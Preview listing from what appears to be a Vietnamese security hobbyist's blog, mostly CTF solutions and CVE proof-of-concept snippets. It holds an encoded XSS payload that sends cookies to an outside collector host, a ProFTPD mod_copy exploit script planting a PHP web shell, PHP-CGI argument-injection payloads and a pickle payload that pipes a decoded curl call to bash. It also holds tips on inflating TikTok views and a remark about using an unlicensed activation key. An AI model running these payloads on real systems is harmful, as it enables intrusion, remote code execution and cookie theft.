Bài đăng

Hình ảnh
 Book Dompurify 3.2.2 co vuln nhung ko exploit dc payload http://172.31.3.2:8000/book?title=PGgxIGlkPSJjb25maWciPjxoMSBpZD0iY29uZmlnIiBuYW1lPSJERUJVRyI%2BPC9oMT48L2gxPg%3D%3D&content=PGltZyBzcmM9eDogb25lcnJvcj0iKG5ldyBJbWFnZSkuc3JjPScvL3Bnb2hpaGd2LnJlcXVlc3RyZXBvLmNvbT8nK2RvY3VtZW50LmNvb2tpZSI%2BDQoNCg%3D%3D
└─$ source venv/bin/activate

CVE-2015-3306

#!/usr/bin/env python3 import sys import socket import requests def exploit ( client , target ):     client .connect(( target , 21 )) # Connecting to the target server     banner = client .recv( 74 )     print ( banner .decode())     client .send( b 'site cpfr /proc/self/cmdline \r\n ' )     print ( client .recv( 1024 ).decode())     client .send( b 'site cpto /tmp/<?php system("id"); ?> \r\n ' ) # phpinfo() is just a PoC.     print ( client .recv( 1024 ).decode())     client .send( b 'site cpfr /tmp/<?php system("id"); ?> \r\n ' )     print ( client .recv( 1024 ).decode())     client .send( b 'site cpto /var/www/html/konchan.php \r\n ' )     print ( client .recv( 1024 ).decode())     client .close()     print ( 'Exploit Completed' ) def check ( url ):     req = requests . get ( url ) # Requesting the written PoC php file via HT...

CVE-2012-1823/CVE-2024-4577

CVE-2012-1823 && CVE-2024-4577 (PHP CGI ARGURMENT INJECTION) $HOST /?-f C:\Windows\System32\Drivers\etc\hosts $HOST /?-d+allow_url_include%3d1+-d+auto_prepend_file%3dphp://input <?php system("ls -la"); ?>

Tanr man 2024

 Tản mạn về năm 2024 của Spycio.Kon Một số thành tích nổi bật trong năm - Tự tay host một ctf nhỏ cho team từ A-Z - Tham gia kì thi lấy chứng chỉ quốc tế với tổng thiệt hại là hơn 500$, 20 ngày mất ngủ và 3 tháng ôn tập (mình được một anh đẹp zai hỗ trợ thi hihi), mặc dù chỉ được 2/3 chặng đường (fail) T__T. Em xin lỗi anh rất nhiều. - Đã giải được một số challenges ở một số giải ctf mà năm trước mình khó có thể giải được - Đã viết POC cho một số CVE mình chơi và được một số trang web crawl trúng, khá vui ^^ https://cve.imfht.com/poc_detail/75cc08888950aec9e37a3c206652083d271746e4 https://cvefeed.io/vuln/detail/CVE-2023-41425 https://154.17.20.211 - Nói chuyện được với một số idol quốc tế như IRELAND WITHOUT RE, Microsoft/Synack redteamer/bug hunter,... - Đã viết trên Viblo và cảm thấy bản thân đã có những đóng góp cho cộng đồng lập trình viên trong và ngoài nước mặc dù nó không có gì nhiều =))) https://viblo.asia/p/huong-dan-tao-discord-bot-bang-lm-studio-3kY4g0pyJAe https://viblo...
Hình ảnh
Here is my solution for  Pickleball and Letmein challenges. :< My team planned to join this ctf, but it seems everyone is busy. So sad. Btw thx authors for the great challenges  ---------------------------------------------------------------------------------------------------------------------------- Pickleball: You can refer to the use of opcodes for bypassing,  https://laxiisteam.blogspot.com/2023/09/kma-thi-sinh-vien-attt-cap-hoc-vien-he.html or just run my script    import base64 import pickle payload = b """(cos system S'echo Y3VybCBwamZ3MmxwNS5yZXF1ZXN0cmVwby5jb20=|base64 -d|bash' o""" ab = base64.b64encode(payload) print (ab)  Let me in: This black box challenge has 0 solves. I’ve never worked with Ruby on Rails before, so I encountered quite a few difficulties. Here’s how I approached it  Giao diện nó đây, có 2 chức năng dễ thấy là signup và signin Wappalyzer cho thấy backend có khả năng được viết bằng Ruby Step1: Path travesal View...

CPS

 https://nhienit.wordpress.com/2020/12/03/tim-hieu-ve-csp-content-security-policy/
 Xóa node_modules trong các dự án ko cần  npx npkill

MMO - Black huntres

Hình ảnh
 Hello xin chào mọi người, dạo này mình cũng đang lấn sang mảng MMO nên cũng muốn share mấy cái tips/tricks cho mọi người. Bài 1: Buff view toptop Mọi người đang bài thường bị flop à, không sao. Tool này sẽ giúp mọi người đẩy số view lên. Điền username toptop vô đây Sau đó đợi 1 lát, nhập capcha và đợi Mình buff view nên chỉ cần này thôi Rồi ok làm theo các bước tự buff là ok. Chờ 15p mỗi lần nhé <(")

forwarding requests from desktop app to burpsuite

Hình ảnh
 Bình thường hóa việc mọi người sẽ phải làm với mấy cái ứng dụng linh tinh trên Windows đi :V Một số application không hỗ trợ kết nối proxy để capture request qua burp thì phải làm sao :v Có nhiều cách để capture như dùng HTTP Debugger, Wireshark,... Ở đây mình sẽ chỉ cho mọi người một tool khá ngon mới cop nhặt được trên mạng =)) Mở bài: Proxifier Đầu tiên thì Download nó về, nó có free trial 30 ngày nhưng mà mình thì không thích lắm nên dùng key kích hoạt luôn <(") Giao diện nó như này Click Profile -> Proxy Server  Mình muốn bắt qua burp thì sẽ cấu hình như sau rồi OK  Bây giờ thử test xem nó có work hay không Ok vậy là được  Ở đây mình sẽ test với zalo.exe. Các bước thì làm như sau Qua burp và bắt req thôi, gõ đại cái gì trên Zalo đi :Vv Tuy nhiên, một số ứng dụng sẽ cần qua giao thức https nên là phải thêm cert của burp vô máy nữa. Lấy cert bằng cách sau Win + R -> nhập certmgr.msc Rồi import vô là xong. Chúc các bạn thành công. Kết bài:  Cảm ơn vì...